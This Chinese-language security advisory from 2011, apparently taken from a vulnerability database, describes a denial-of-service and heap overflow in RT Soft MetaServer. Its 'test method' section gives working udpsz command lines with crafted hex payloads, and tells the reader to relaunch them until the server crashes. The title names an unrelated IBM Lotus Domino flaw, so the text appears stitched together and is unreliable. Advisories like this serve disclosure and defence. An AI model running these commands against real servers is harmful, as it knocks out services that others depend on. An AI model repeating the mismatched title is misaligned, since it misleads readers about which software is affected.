IBM Lotus Domino “NSFComputeEvaluateExt()”函数远程栈缓冲区
发布日期:2011-09-21
更新日期:2011-09-21
受影响系统:
RT Soft MetaServer 3.2.1.450
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 49696
MetaServer RT是实时的数据处理和计算软件。
MetaServer RT在处理发送到TCP端口2194的恶意报文时存在拒绝服务漏洞,可被远程攻击者利用造成应用程序崩溃。
通过发送到2189、2192、2194的特制报文和不断的重复连接,可造成堆溢出。使用了"MESSA"和"ROSCO"命令。
<*来源:Luigi Auriemma ([email protected])
链接:http://aluigi.altervista.org/adv/metaserver_1-adv.txt
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://aluigi.org/testz/udpsz.zip
A]
udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff
stop after at least 50 dots and relaunch the command again till the
crashing of the server during a memcpy.
B]
udpsz -b 0x80 -T SERVER 2194 1000
udpsz -C "cdab0000 00000000 00ffffff 00000000 00000000 524f53434f" -T SERVER 2189 -1
...others...
建议:
--------------------------------------------------------------------------------
厂商补丁:
RT Soft
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: